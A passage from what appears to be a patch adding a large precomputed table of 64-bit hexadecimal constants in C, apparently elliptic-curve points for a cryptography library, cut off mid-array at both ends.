UINT64_C(0xB322EE30EA31C83B) } }, ++ { { UINT64_C(0x048813847890E234), UINT64_C(0x387F1159672E70C6), ++ UINT64_C(0x1468A6147B307F75), UINT64_C(0x56335B52ED85EC96), ++ UINT64_C(0xDA1BB60FD45BCAE9), UINT64_C(0x4D94F3F0F9FAEADD) }, ++ { UINT64_C(0x6C6A7183FC78D86B), UINT64_C(0xA425B5C73018DEC6), ++ UINT64_C(0xB1549C332D877399), UINT64_C(0x6C41C50C92B2BC37), ++ UINT64_C(0x3A9F380C83EE0DDB), UINT64_C(0xDED5FEB6C4599E73) } }, ++ { { UINT64_C(0x14D34C210B7F8354), UINT64_C(0x1475A1CD9177CE45), ++ UINT64_C(0x9F5F764A9B926E4B), UINT64_C(0x77260D1E05DD21FE), ++ UINT64_C(0x3C882480C4B937F7), UINT64_C(0xC92DCD39722372F2) }, ++ { UINT64_C(0xF636A1BEEC6F657E), UINT64_C(0xB0E6C3121D30DD35), ++ UINT64_C(0xFE4B0528E4654EFE), UINT64_C(0x1C4A682021D230D2), ++ UINT64_C(0x615D2E4898FA45AB), UINT64_C(0x1F35D6D801FDBABF) } }, ++ { { UINT64_C(0xA636EEB83A7B10D1), UINT64_C(0x4E1AE352F4A29E73), ++ UINT64_C(0x01704F5FE6BB1EC7), UINT64_C(0x75C04F720EF020AE), ++ UINT64_C(0x448D8CEE5A31E6A6), UINT64_C(0xE40A9C29208F994B) }, ++ { UINT64_C(0x69E09A30FD8F9D5D), UINT64_C(0xE6A5F7EB449BAB7E), ++ UINT64_C(0xF25BC18A2AA1768B), UINT64_C(0x9449E4043C841234), ++ UINT64_C(0x7A3BF43E016A7BEF), UINT64_C(0xF25803E82A150B60) } }, ++ { { UINT64_C(0xE44A2A57B215F9E0), UINT64_C(0x38B34DCE19066F0A), ++ UINT64_C(0x8BB91DAD40BB1BFB), UINT64_C(0x64C9F775E67735FC), ++ UINT64_C(0xDE14241788D613CD), UINT64_C(0xC5014FF51901D88D) }, ++ { UINT64_C(0xA250341DF38116B0), UINT64_C(0xF96B9DD49D6CBCB2), ++ UINT64_C(0x15EC6C7276B3FAC2), UINT64_C(0x88F1952F8124C1E9), ++ UINT64_C(0x6B72F8EA975BE4F5), UINT64_C(0x23D288FF061F7530) } }, ++ { { UINT64_C(0xEBFE3E5FAFB96CE3), UINT64_C(0x2275EDFBB1979537), ++ UINT64_C(0xC37AB9E8C97BA741), UINT64_C(0x446E4B1063D7C626), ++ UINT64_C(0xB73E2DCED025EB02), UINT64_C(0x1F952B517669EEA7) }, ++ { UINT64_C(0xABDD00F66069A424), UINT64_C(0x1C0F9D9BDC298BFB), ++ UINT64_C(0x831B1FD3EB757B33), UINT64_C(0xD7DBE18359D60B32), ++ UINT64_C(0x663D1F369EF094B3), UINT64_C(0x1BD5732E67F7F11A) } }, ++ { { UINT64_C(0x3C7FB3F5C75D8892), UINT64_C(0x2CFF9A0CBA68DA69), ++ UINT64_C(0x76455E8B60EC740B), UINT64_C(0x4B8D67FF167B88F0), ++ UINT64_C(0xEDEC0C025A4186B1), UINT64_C(0x127C462DBEBF35AB) }, ++ { UINT64_C(0x9159C67E049430FC), UINT64_C(0x86B21DD2E7747320), ++ UINT64_C(0x0E0E01520CF27B89), UINT64_C(0x705F28F5CD1316B6), ++ UINT64_C(0x76751691BEAEA8A8), UINT64_C(0x4C73E282360C5B69) } }, ++ { { UINT64_C(0x46BCC0D5FD7B3D74), UINT64_C(0x6F13C20E0DC4F410), ++ UINT64_C(0x98A1AF7D72F11CDF), UINT64_C(0x6099FD837928881C), ++ UINT64_C(0x66976356371BB94B), UINT64_C(0x673FBA7219B945AB) }, ++ { UINT64_C(0xE4D8FA6EAED00700), UINT64_C(0xEA2313EC5C71A9F7), ++ UINT64_C(0xF9ED8268F99D4AEA), UINT64_C(0xADD8916442AB59C7), ++ UINT64_C(0xB37EB26F3F3A2D45), UINT64_C(0x0B39BD7AA924841E) } }, ++ { { UINT64_C(0xD811EB32E03CDBBB), UINT64_C(0x12055F1D7CC3610E), ++ UINT64_C(0x6B23A1A0A9046E3F), UINT64_C(0x4D7121229DD4A749), ++ UINT64_C(0xB0C2ACA1B1BF0AC3), UINT64_C(0x71EFF575C1B0432F) }, ++ { UINT64_C(0x6CD814922B44E285), UINT64_C(0x3088BD9CD87E8D20), ++ UINT64_C(0xACE218E5F567E8FA), UINT64_C(0xB3FA0424CF90CBBB), ++ UINT64_C(0xADBDA751770734D3), UINT64_C(0xBCD78BAD5AD6569A) } }, ++ { { UINT64_C(0xCADB31FA7F39641F), UINT64_C(0x3EF3E295825E5562), ++ UINT64_C(0x4893C633F4094C64), UINT64_C(0x52F685F18ADDF432), ++ UINT64_C(0x9FD887AB7FDC9373), UINT64_C(0x47A9ADA0E8680E8B) }, ++ { UINT64_C(0x579313B7F0CD44F6), UINT64_C(0xAC4B8668E188AE2E), ++ UINT64_C(0x648F43698FB145BD), UINT64_C(0xE0460AB374629E31), ++ UINT64_C(0xC25F28758FF2B05F), UINT64_C(0x4720C2B62D31EAEA) } }, ++ { { UINT64_C(0x4603CDF413D48F80), UINT64_C(0x9ADB50E2A49725DA), ++ UINT64_C(0x8CD3305065DF63F0), UINT64_C(0x58D8B3BBCD643003), ++ UINT64_C(0x170A4F4AB739826B), UINT64_C(0x857772B51EAD0E17) }, ++ { UINT64_C(0x01B78152E65320F1), UINT64_C(0xA6B4D845B7503FC0), ++ UINT64_C(0x0F5089B93DD50798), UINT64_C(0x488F200F5690B6BE), ++ UINT64_C(0x220B4ADF9E096F36), UINT64_C(0x474D7C9F8CE5BC7C) } }, ++ { { UINT64_C(0xFED8C058C745F8C9), UINT64_C(0xB683179E291262D1), ++ UINT64_C(0x26ABD367D15EE88C), UINT64_C(0x29E8EED3F60A6249), ++ UINT64_C(0xED6008BB1E02D6E1), UINT64_C(0xD82ECF4CA6B12B8D) }, ++ { UINT64_C(0x9929D021AAE4FA22), UINT64_C(0xBE4DEF14336A1AB3), ++ UINT64_C(0x529B7E098C80A312), UINT64_C(0xB059188DEE0EB0CE), ++ UINT64_C(0x1E42979A16DEAB7F), UINT64_C(0x2411034984EE9477) } }, ++ { { UINT64_C(0xD65246852BE579CC), UINT64_C(0x849316F1C456FDED), ++ UINT64_C(0xC51B7DA42D1B67DA), UINT64_C(0xC25B539E41BC6D6A), ++ UINT64_C(0xE3B7CCA3A9BF8BED), UINT64_C(0x813EF18C045C15E4) }, ++ { UINT64_C(0x5F3789A1697982C4), UINT64_C(0x4C1253698C435566), ++ UINT64_C(0x00A7AE6EDC0A92C6), UINT64_C(0x1ABC929B2F64A053), ++ UINT64_C(0xF4925C4C38666B44), UINT64_C(0xA81044B00F3DE7F6) } }, ++ }, ++ { ++ { { UINT64_C(0xBCC88422C2EC3731), UINT64_C(0x78A3E4D410DC4EC2), ++ UINT64_C(0x745DA1EF2571D6B1), UINT64_C(0xF01C2921739A956E), ++ UINT64_C(0xEFFD8065E4BFFC16), UINT64_C(0x6EFE62A1F36FE72C) }, ++ { UINT64_C(0xF49E90D20F4629A4), UINT64_C(0xADD1DCC78CE646F4), ++ UINT64_C(0xCB78B583B7240D91), UINT64_C(0x2E1A7C3C03F8387F), ++ UINT64_C(0x16566C223200F2D9), UINT64_C(0x2361B14BAAF80A84) } }, ++ { { UINT64_C(0xDB1CFFD2B5733309), UINT64_C(0x24BC250B0F9DD939), ++ UINT64_C(0xA4181E5AA3C1DB85), UINT64_C(0xE5183E51AC55D391), ++ UINT64_C(0x2793D5EFEFD270D0), UINT64_C(0x7D56F63DC0631546) }, ++ { UINT64_C(0xECB40A590C1EE59D), UINT64_C(0xE613A9E4BB5BFA2C), ++ UINT64_C(0xA89B14AB6C5830F9), UINT64_C(0x4DC477DCA03F201E), ++ UINT64_C(0x5604F5DAC88C54F6), UINT64_C(0xD49264DC2ACFC66E) } }, ++ { { UINT64_C(0x283DD7F01C4DFA95), UINT64_C(0xB898CC2C62C0B160), ++ UINT64_C(0xBA08C095870282AA), UINT64_C(0xB02B00D8F4E36324), ++ UINT64_C(0x53AADDC0604CECF2), UINT64_C(0xF1F927D384DDD24E) }, ++ { UINT64_C(0x34BC00A0E2ABC9E1), UINT64_C(0x2DA1227D60289F88), ++ UINT64_C(0x5228EAAACEF68F74), UINT64_C(0x40A790D23C029351), ++ UINT64_C(0xE0E9AF5C8442E3B7), UINT64_C(0xA3214142A9F141E0) } }, ++ { { UINT64_C(0x72F4949EF9A58E3D), UINT64_C(0x738C700BA48660A6), ++ UINT64_C(0x71B04726092A5805), UINT64_C(0xAD5C3C110F5CDB72), ++ UINT64_C(0xD4951F9E554BFC49), UINT64_C(0xEE594EE56131EBE7) }, ++ { UINT64_C(0x37DA59F33C1AF0A9), UINT64_C(0xD7AFC73BCB040A63), ++ UINT64_C(0xD020962A4D89FA65), UINT64_C(0x2610C61E71D824F5), ++ UINT64_C(0x9C917DA73C050E31), UINT64_C(0x3840F92FE6E7EBFB) } }, ++ { { UINT64_C(0x50FBD7FE8D8B8CED), UINT64_C(0xC7282F7547D240AE), ++ UINT64_C(0x79646A471930FF73), UINT64_C(0x2E0BAC4E2F7F5A77), ++ UINT64_C(0x0EE44FA526127E0B), UINT64_C(0x678881B782BC2AA7) }, ++ { UINT64_C(0xB9E5D38467F5F497), UINT64_C(0x8F94A7D4A9B7106B), ++ UINT64_C(0xBF7E0B079D329F68), UINT64_C(0x169B93EA45D192FB), ++ UINT64_C(0xCCAA946720DBE8C0), UINT64_C(0xD4513A50938F9574) } }, ++ { { UINT64_C(0x841C96B4054CB874), UINT64_C(0xD75B1AF1A3C26834), ++ UINT64_C(0x7237169DEE6575F0), UINT64_C(0xD71FC7E50322AADC), ++ UINT64_C(0xD7A23F1E949E3A8E), UINT64_C(0x77E2D102DD31D8C7) }, ++ { UINT64_C(0x5AD69D09D10F5A1F), UINT64_C(0x526C9CB4B99D9A0B), ++ UINT64_C(0x521BB10B972B237D), UINT64_C(0x1E4CD42FA326F342), ++ UINT64_C(0x5BB6DB27F0F126CA), UINT64_C(0x587AF22CA4A515AD) } }, ++ { { UINT64_C(0x1123A531B12E542F), UINT64_C(0x1D01A64DB9EB2811), ++ UINT64_C(0xA4A3515BF2D70F87), UINT64_C(0xFA205234B4BD0270), ++ UINT64_C(0x74B818305EDA26B9), UINT64_C(0x9305D6E656578E75) }, ++ { UINT64_C(0xF38E69DE9F11BE19), UINT64_C(0x1E2A5C2344DBE89F), ++ UINT64_C(0x1077E7BCFD286654), UINT64_C(0xD36698940FCA4741), ++ UINT64_C(0x893BF904278F8497), UINT64_C(0xD6AC5F83EB3E14F4) } }, ++ { { UINT64_C(0x327B9DAB488F5F74), UINT64_C(0x2B44F4B8CAB7364F), ++ UINT64_C(0xB4A6D22D19B6C6BD), UINT64_C(0xA087E613FC77CD3E), ++ UINT64_C(0x4558E327B0B49BC7), UINT64_C(0x188805BECD835D35) }, ++ { UINT64_C(0x592F293CC1DC1007), UINT64_C(0xFAEE660F6AF02B44), ++ UINT64_C(0x5BFBB3BF904035F2), UINT64_C(0xD7C9AE6079C07E70), ++ UINT64_C(0xC5287DD4234896C2), UINT64_C(0xC4CE4523CB0E4121) } }, ++ { { UINT64_C(0x3626B40658344831), UINT64_C(0xABCCE3568E55C984), ++ UINT64_C(0x495CC81C77241602), UINT64_C(0x4FB796766D70DF8F), ++ UINT64_C(0x6354B37C5B071DCA), UINT64_C(0x2CAD80A48C0FC0AD) }, ++ { UINT64_C(0x18AADD51F68739B4), UINT64_C(0x1BFBB17747F09C6C), ++ UINT64_C(0x9355EA19A8FD51C4), UINT64_C(0x3D512A84EE58DB7B), ++ UINT64_C(0x70842AFDE9237640), UINT64_C(0x36F515CAACAF858D) } }, ++ { { UINT64_C(0x3DDEC7C47E768B23), UINT64_C(0x97E13C53036D43ED), ++ UINT64_C(0x871E59253A39AB5F), UINT64_C(0x9AF292DE07E68E2B), ++ UINT64_C(0x411583494A40112E), UINT64_C(0xCDBB46AF3D4D97E6) }, ++ { UINT64_C(0x2F8912933C0EBE40), UINT64_C(0x696C7EEE3EBAD1E5), ++ UINT64_C(0x8A5F3B6933B50D99), UINT64_C(0xB7BC48407ED47DDE), ++ UINT64_C(0x3A6F8E6C1E6706D8), UINT64_C(0x6A1479433D84BB8F) } }, ++ { { UINT64_C(0xEC3A9C78603AE8D1), UINT64_C(0xBFE07E37228C29E5), ++ UINT64_C(0xB0385C5B396DBC2B), UINT64_C(0x7C14FE83DF85F41F), ++ UINT64_C(0xE2E64676ADFD463E), UINT64_C(0x5BEF10AA8BF9F23D) }, ++ { UINT64_C(0xFA83EA0DF6BAB6DA), UINT64_C(0xCD0C8BA5966BF7E3), ++ UINT64_C(0xD62216B498501C2E), UINT64_C(0xB7F298A4C3E69F2D), ++ UINT64_C(0x42CEF13B9C8740F4), UINT64_C(0xBB317E520DD64307) } }, ++ { { UINT64_C(0x22B6245C3FFEE775), UINT64_C(0x5C3F60BEB37CE7AA), ++ UINT64_C(0xDE195D40E1FEC0DF), UINT64_C(0x3BFAFBC5A0A82074), ++ UINT64_C(0xC36EC86AC72CA86A), UINT64_C(0x5606285113FD43EA) }, ++ { UINT64_C(0x8686BE808E0B03A4), UINT64_C(0xC3BD1F93D540D440), ++ UINT64_C(0x13E4EBC0BF96CEC5), UINT64_C(0xE8E239849190C844), ++ UINT64_C(0x183593A600844802), UINT64_C(0x467168794D206878) } }, ++ { { UINT64_C(0x358F394DB6F63D19), UINT64_C(0xA75D48496B052194), ++ UINT64_C(0x584035905C8D7975), UINT64_C(0x86DC9B6B6CBFBD77), ++ UINT64_C(0x2DB04D77647A51E5), UINT64_C(0x5E9A5B02F8950D88) }, ++ { UINT64_C(0xCE69A7E5017168B0), UINT64_C(0x94630FACC4843AD3), ++ UINT64_C(0xB3B9D7361EFC44FF), UINT64_C(0xE729E9B6B14D7F93), ++ UINT64_C(0xA071FC60E0ED0ABC), UINT64_C(0xFC1A99718C8D9B83) } }, ++ { { UINT64_C(0x49686031D138E975), UINT64_C(0x648640385A8EF0D1), ++ UINT64_C(0x32679713E7F7DE49), UINT64_C(0x5913234929D1CD1D), ++ UINT64_C(0x849AA23A20BE9ED2), UINT64_C(0x15D303E1284B3F33) }, ++ { UINT64_C(0x37309475B63F9FE9), UINT64_C(0x327BAC8B45B7256A), ++ UINT64_C(0x291CD227D17FC5D3), UINT64_C(0x8291D8CDA973EDF1), ++ UINT64_C(0xF3843562437ABA09), UINT64_C(0x33FFB704271D0785) } }, ++ { { UINT64_C(0x5248D6E447E11E5E), UINT64_C(0x0F66FC3C269C7ED3), ++ UINT64_C(0x18C0D2B9903E346E), UINT64_C(0xD81D9D974BEAE1B8), ++ UINT64_C(0x610326B0FC30FDF3), UINT64_C(0x2B13687019A7DFCD) }, ++ { UINT64_C(0xEC75F70AB9527676), UINT64_C(0x90829F5129A3D897), ++ UINT64_C(0x92FE180997980302), UINT64_C(0xA3F2498E68474991), ++ UINT64_C(0x6A66307B0F22BBAD), UINT64_C(0x32014B9120378557) } }, ++ { { UINT64_C(0x72CD7D553CD98610), UINT64_C(0xC3D560B074504ADF), ++ UINT64_C(0x23F0A982CEBB5D5D), UINT64_C(0x1431C15BB839DDB8), ++ UINT64_C(0x7E207CD8CEB72207), UINT64_C(0x28E0A848E7EFB28D) }, ++ { UINT64_C(0xD22561FE1BD96F6E), UINT64_C(0x04812C1862A8236B), ++ UINT64_C(0xA0BF2334975491FA), UINT64_C(0x294F42A6435DF87F), ++ UINT64_C(0x2772B783A5D6F4F6), UINT64_C(0x348F92ED2724F853) } }, ++ }, ++ { ++ { { UINT64_C(0xC20FB9111A42E5E7), UINT64_C(0x075A678B81D12863), ++ UINT64_C(0x12BCBC6A5CC0AA89), UINT64_C(0x5279C6AB4FB9F01E), ++ UINT64_C(0xBC8E178911AE1B89), UINT64_C(0xAE74A706C290003C) }, ++ { UINT64_C(0x9949D6EC79DF3F45), UINT64_C(0xBA18E26296C8D37F), ++ UINT64_C(0x68DE6EE2DD2275BF), UINT64_C(0xA9E4FFF8C419F1D5), ++ UINT64_C(0xBC759CA4A52B5A40), UINT64_C(0xFF18CBD863B0996D) } }, ++ { { UINT64_C(0x73C57FDED7DD47E5), UINT64_C(0xB0FE5479D49A7F5D), ++ UINT64_C(0xD25C71F1CFB9821E), UINT64_C(0x9427E209CF6A1D68), ++ UINT64_C(0xBF3C3916ACD24E64), UINT64_C(0x7E9F5583BDA7B8B5) }, ++ { UINT64_C(0xE7C5F7C8CF971E11), UINT64_C(0xEC16D5D73C7F035E), ++ UINT64_C(0x818DC472E66B277C), UINT64_C(0x4413FD47B2816F1E), ++ UINT64_C(0x40F262AF48383C6D), UINT64_C(0xFB0575844F190537) } }, ++ { { UINT64_C(0x487EDC0708962F6B), UINT64_C(0x6002F1E7190A7E55), ++ UINT64_C(0x7FC62BEA10FDBA0C), UINT64_C(0xC836BBC52C3DBF33), ++ UINT64_C(0x4FDFB5C34F7D2A46), UINT64_C(0x824654DEDCA0DF71) }, ++ { UINT64_C(0x30A076760C23902B), UINT64_C(0x7F1EBB9377FBBF37), ++ UINT64_C(0xD307D49DFACC13DB), UINT64_C(0x148D673AAE1A261A), ++ UINT64_C(0xE008F95B52D98650), UINT64_C(0xC76144409F558FDE) } }, ++ { { UINT64_C(0x17CD6AF69CB16650), UINT64_C(0x86CC27C169F4EEBE), ++ UINT64_C(0x7E495B1D78822432), UINT64_C(0xFED338E31B974525), ++ UINT64_C(0x527743D386F3CE21), UINT64_C(0x87948AD3B515C896) }, ++ { UINT64_C(0x9FDE7039B17F2FB8), UINT64_C(0xA2FA9A5FD9B89D96), ++ UINT64_C(0x5D46600B36FF74DC), UINT64_C(0x8EA74B048302C3C9), ++ UINT64_C(0xD560F570F744B5EB), UINT64_C(0xC921023BFE762402) } }, ++ { { UINT64_C(0xA35AB657FFF4C8ED), UINT64_C(0x017C61248A5FABD7), ++ UINT64_C(0x5646302509ACDA28), UINT64_C(0x6038D36114CF238A), ++ UINT64_C(0x1428B1B6AF1B9F07), UINT64_C(0x5827FF447482E95C) }, ++ { UINT64_C(0xCB997E18780FF362), UINT64_C(0x2B89D702E0BCAC1E), ++ UINT64_C(0xC632A0B5A837DDC8), UINT64_C(0xF3EFCF1F59762647), ++ UINT64_C(0xE9BA309A38B0D60A), UINT64_C(0x05DEABDD20B5FB37) } }, ++ { { UINT64_C(0xD44E5DBACB8AF047), UINT64_C(0x15400CB4943CFE82), ++ UINT64_C(0xDBD695759DF88B67), UINT64_C(0x8299DB2BB2405A7D), ++ UINT64_C(0x46E3BF770B1D80CD), UINT64_C(0xC50CF66CE82BA3D9) }, ++ { UINT64_C(0xB2910A07F2F747A9), UINT64_C(0xF6B669DB5ADC89C1), ++ UINT64_C(0x3B5EF1A09052B081), UINT64_C(0x0F5D5ED3B594ACE2), ++ UINT64_C(0xDA30B8D5D5F01320), UINT64_C(0x0D688C5EAAFCD58F) } }, ++ { { UINT64_C(0x5EEE3A312A161074), UINT64_C(0x6BAAAE56EFE2BE37), ++ UINT64_C(0xF9787F61E3D78698), UINT64_C(0xC6836B2650630A30), ++ UINT64_C(0x7445B85D1445DEF1), UINT64_C(0xD72016A2D568A6A5) }, ++ { UINT64_C(0x9DD6F533E355614F), UINT64_C(0x637E7E5F91E04588), ++ UINT64_C(0x42E142F3B9FB1391), UINT64_C(0x0D07C05C41AFE5DA), ++ UINT64_C(0xD7CD25C81394EDF1), UINT64_C(0xEBE6A0FCB99288EE) } }, ++ { { UINT64_C(0xB8E63B7BBABBAD86), UINT64_C(0x63226A9F90D66766), ++ UINT64_C(0x263818365CF26666), UINT64_C(0xCCBD142D4CADD0BF), ++ UINT64_C(0xA070965E9AC29470), UINT64_C(0x6BDCA26025FF23ED) }, ++ { UINT64_C(0xD4E00FD487DCA7B3), UINT64_C(0xA50978339E0E8734), ++ UINT64_C(0xF73F162E048173A4), UINT64_C(0xD23F91969C3C2FA2), ++ UINT64_C(0x9AB98B45E4AC397A), UINT64_C(0x2BAA0300543F2D4B) } }, ++ { { UINT64_C(0xBBBE15E7C658C445), UINT64_C(0xB8CBCB20C28941D1), ++ UINT64_C(0x65549BE2027D6540), UINT64_C(0xEBBCA8021E8EF4F4), ++ UINT64_C(0x18214B4BD2ACA397), UINT64_C(0xCBEC7DE2E31784A3) }, ++ { UINT64_C(0x96F0533F0116FDF3), UINT64_C(0x68911C905C8F5EE1), ++ UINT64_C(0x7DE9A3AED568603A), UINT64_C(0x3F56C52C6A3AD7B7), ++ UINT64_C(0x5BE9AFCA670B4D0E), UINT64_C(0x628BFEEE375DFE2F) } }, ++ { { UINT64_C(0x97DAE81BDD4ADDB3), UINT64_C(0x12D2CF4E8704761B), ++ UINT64_C(0x5E820B403247788D), UINT64_C(0x82234B620051CA80), ++ UINT64_C(0x0C62704D6CB5EA74), UINT64_C(0xDE56042023941593) }, ++ { UINT64_C(0xB3912A3CF1B04145), UINT64_C(0xE3967CD7AF93688D), ++ UINT64_C(0x2E2DCD2F58DABB4B), UINT64_C(0x6564836F0E303911), ++ UINT64_C(0x1F10F19BECE07C5C), UINT64_C(0xB47F07EED8919126) } }, ++ { { UINT64_C(0xE3545085E9A2EEC9), UINT64_C(0x81866A972C8E51FE), ++ UINT64_C(0xD2BA7DB550027243), UINT64_C(0x29DAEAB54AE87DE4), ++ UINT64_C(0x5EF3D4B8684F9497), UINT64_C(0xE2DACE3B9D5D6873) }, ++ { UINT64_C(0xF012C951FFD29C9C), UINT64_C(0x48289445ADBADA14), ++ UINT64_C(0x8751F50D89558C49), UINT64_C(0x75511A4F99E35BEE), ++ UINT64_C(0xEF802D6E7D59AA5F), UINT64_C(0x14FCAD65A2A795E2) } }, ++ { { UINT64_C(0xC8EB00E808CB8F2C), UINT64_C(0x686075322B45BD86), ++ UINT64_C(0x7A29B45959969713), UINT64_C(0x5FA15B9BD684201B), ++ UINT64_C(0x1A853190B9E538EE), UINT64_C(0x4150605CD573D043) }, ++ { UINT64_C(0xEF011D3BEB9FBB68), UINT64_C(0x6727998266AE32B6), ++ UINT64_C(0x861B86EA445DE5EC), UINT64_C(0x62837D18A34A50E1), ++ UINT64_C(0x228C006ABF5F0663), UINT64_C(0xE007FDE7396DB36A) } }, ++ { { UINT64_C(0xDEE4F8815A916A55), UINT64_C(0x20DC0370F39C82CB), ++ UINT64_C(0xD9A7161540F09821), UINT64_C(0xD50AD8BFF7273492), ++ UINT64_C(0xA06F7D1232E7C4BF), UINT64_C(0xFA0F61544C5CEA36) }, ++ { UINT64_C(0xF4FD9BED5FC49CFE), UINT64_C(0xD8CB45D1C9291678), ++ UINT64_C(0x94DB86CC7B92C9F2), UINT64_C(0x09CA5F3873C81169), ++ UINT64_C(0x109F40B0AEED06F0), UINT64_C(0x9F0360B214DCAA0A) } }, ++ { { UINT64_C(0x4189B70DE12AD3E7), UINT64_C(0x5208ADB210B06607), ++ UINT64_C(0xEBD8E2A2EE8497FA), UINT64_C(0x61B1BD67E04F2ECB), ++ UINT64_C(0x0E2DDA724F3F5F99), UINT64_C(0xD5D96740F747B16D) }, ++ { UINT64_C(0x308A48F6A6BF397F), UINT64_C(0x7021C3E523A93595), ++ UINT64_C(0xF10B022936470AA0), UINT64_C(0x7761E8EC4E03295B), ++ UINT64_C(0x16EFEF5807339770), UINT64_C(0x0D55D2DD5DA5DAA2) } }, ++ { { UINT64_C(0x915EA6A38A22F87A), UINT64_C(0x191151C12E5A088E), ++ UINT64_C(0x190252F17F1D5CBE), UINT64_C(0xE43F59C33B0EC99B), ++ UINT64_C(0xBE8588D4FF2A6135), UINT64_C(0x103877CC2ECB4B9F) }, ++ { UINT64_C(0x8F4147E5023CF92B), UINT64_C(0xC24384CC0CC2085B), ++ UINT64_C(0x6A2DB4A2D082D311), UINT64_C(0x06283811ED7BA9AE), ++ UINT64_C(0xE9A3F5322A8E1592), UINT64_C(0xAC20F0F45A59E894) } }, ++ { { UINT64_C(0x788CAA5274AAB4B1), UINT64_C(0xEB84ABA12FEAFC7E), ++ UINT64_C(0x31DA71DAAC04FF77), UINT64_C(0x39D12EB924E4D0BF), ++ UINT64_C(0x4F2F292F87A34EF8), UINT64_C(0x9B324372A237A8ED) }, ++ { UINT64_C(0xBB2D04B12EE3A82D), UINT64_C(0xED4FF367D18D36B2), ++ UINT64_C(0x99D231EEA6EA0138), UINT64_C(0x7C2D4F064F92E04A), ++ UINT64_C(0x78A82AB2CA272FD0), UINT64_C(0x7EC41340AB8CDC32) } }, ++ }, ++ { ++ { { UINT64_C(0xD23658C8D2E15A8C), UINT64_C(0x23F93DF716BA28CA), ++ UINT64_C(0x6DAB10EC082210F1), UINT64_C(0xFB1ADD91BFC36490), ++ UINT64_C(0xEDA8B02F9A4F2D14), UINT64_C(0x9060318C56560443) }, ++ { UINT64_C(0x6C01479E64711AB2), UINT64_C(0x41446FC7E337EB85), ++ UINT64_C(0x4DCF3C1D71888397), UINT64_C(0x87A9C04E13C34FD2), ++ UINT64_C(0xFE0E08EC510C15AC), UINT64_C(0xFC0D0413C0F495D2) } }, ++ { { UINT64_C(0xEB05C516156636C2), UINT64_C(0x2F613ABA090E93FC), ++ UINT64_C(0xCFD573CD489576F5), UINT64_C(0xE6535380535A8D57), ++ UINT64_C(0x13947314671436C4), UINT64_C(0x1172FB0C5F0A122D) }, ++ { UINT64_C(0xAECC7EC1C12F58F6), UINT64_C(0xFE42F9578E41AFD2), ++ UINT64_C(0xDF96F6523D4221AA), UINT64_C(0xFEF5649F2851996B), ++ UINT64_C(0x46FB9F26D5CFB67E), UINT64_C(0xB047BFC7EF5C4052) } }, ++ { { UINT64_C(0x5CBDC442F4484374), UINT64_C(0x6B156957F92452EF), ++ UINT64_C(0x58A26886C118D02A), UINT64_C(0x87FF74E675AAF276), ++ UINT64_C(0xB133BE95F65F6EC1), UINT64_C(0xA89B62844B1B8D32) }, ++ { UINT64_C(0xDD8A8EF309C81004), UINT64_C(0x7F8225DB0CF21991), ++ UINT64_C(0xD525A6DB26623FAF), UINT64_C(0xF2368D40BAE15453), ++ UINT64_C(0x55D6A84D84F89FC9), UINT64_C(0xAF38358A86021A3E) } }, ++ { { UINT64_C(0xBD048BDCFF52E280), UINT64_C(0x8A51D0B2526A1795), ++ UINT64_C(0x40AAA758A985AC0F), UINT64_C(0x6039BCDCF2C7ACE9), ++ UINT64_C(0x712092CC6AEC347D), UINT64_C(0x7976D0906B5ACAB7) }, ++ { UINT64_C(0x1EBCF80D6EED9617), UINT64_C(0xB3A63149B0F404A4), ++ UINT64_C(0x3FDD3D1AD0B610EF), UINT64_C(0xDD3F6F9498C28AC7), ++ UINT64_C(0x650B77943A59750F), UINT64_C(0xEC59BAB12D3991AC) } }, ++ { { UINT64_C(0x01F40E882E552766), UINT64_C(0x1FE3D50966F5354F), ++ UINT64_C(0x0E46D006B3A8EA7F), UINT64_C(0xF75AB629F831CD6A), ++ UINT64_C(0xDAD808D791465119), UINT64_C(0x442405AF17EF9B10) }, ++ { UINT64_C(0xD5FE0A96672BDFCB), UINT64_C(0xA9DFA422355DBDEC), ++ UINT64_C(0xFDB79AA179B25636), UINT64_C(0xE7F26FFDEECE8AEC), ++ UINT64_C(0xB59255507EDD5AA2), UINT64_C(0x2C8F6FF08EB3A6C2) } }, ++ { { UINT64_C(0x88887756757D6136), UINT64_C(0xAD9AC18388B92E72), ++ UINT64_C(0x92CB2FC48785D3EB), UINT64_C(0xD1A542FE9319764B), ++ UINT64_C(0xAF4CC78F626A62F8), UINT64_C(0x7F3F5FC926BFFAAE) }, ++ { UINT64_C(0x0A203D4340AE2231), UINT64_C(0xA8BFD9E0387898E8), ++ UINT64_C(0x1A0C379C474B7DDD), UINT64_C(0x03855E0A34FD49EA), ++ UINT64_C(0x02B26223B3EF4AE1), UINT64_C(0x804BD8CFE399E0A3) } }, ++ { { UINT64_C(0x11A9F3D0DE865713), UINT64_C(0x81E36B6BBDE98821), ++ UINT64_C(0x324996C86AA891D0), UINT64_C(0x7B95BDC1395682B5), ++ UINT64_C(0x47BF2219C1600563), UINT64_C(0x7A473F50643E38B4) }, ++ { UINT64_C(0x0911F50AF5738288), UINT64_C(0xDF947A706F9C415B), ++ UINT64_C(0xBDB994F267A067F6), UINT64_C(0x3F4BEC1B88BE96CD), ++ UINT64_C(0x9820E931E56DD6D9), UINT64_C(0xB138F14F0A80F419) } }, ++ { { UINT64_C(0xA11A1A8F0429077A), UINT64_C(0x2BB1E33D10351C68), ++ UINT64_C(0x3C25ABFE89459A27), UINT64_C(0x2D0091B86B8AC774), ++ UINT64_C(0xDAFC78533B2415D9), UINT64_C(0xDE713CF19201680D) }, ++ { UINT64_C(0x8E5F445D68889D57), UINT64_C(0x608B209C60EABF5B), ++ UINT64_C(0x10EC0ACCF9CFA408), UINT64_C(0xD5256B9D4D1EE754), ++ UINT64_C(0xFF866BAB0AA6C18D), UINT64_C(0x9D196DB8ACB90A45) } }, ++ { { UINT64_C(0xA46D76A9B9B081B2), UINT64_C(0xFC743A1062163C25), ++ UINT64_C(0xCD2A5C8D7761C392), UINT64_C(0x39BDDE0BBE808583), ++ UINT64_C(0x7C416021B98E4DFE), UINT64_C(0xF930E56365913A44) }, ++ { UINT64_C(0xC3555F7E7585CF3C), UINT64_C(0xC737E3833D6333D5), ++ UINT64_C(0x5B60DBA4B430B03D), UINT64_C(0x42B715EBE7555404), ++ UINT64_C(0x571BDF5B7C7796E3), UINT64_C(0x33DC62C66DB6331F) } }, ++ { { UINT64_C(0x3FB9CCB0E61DEE59), UINT64_C(0xC5185F2318B14DB9), ++ UINT64_C(0x1B2ADC4F845EF36C), UINT64_C(0x195D5B505C1A33AB), ++ UINT64_C(0x8CEA528E421F59D2), UINT64_C(0x7DFCCECFD2931CEA) 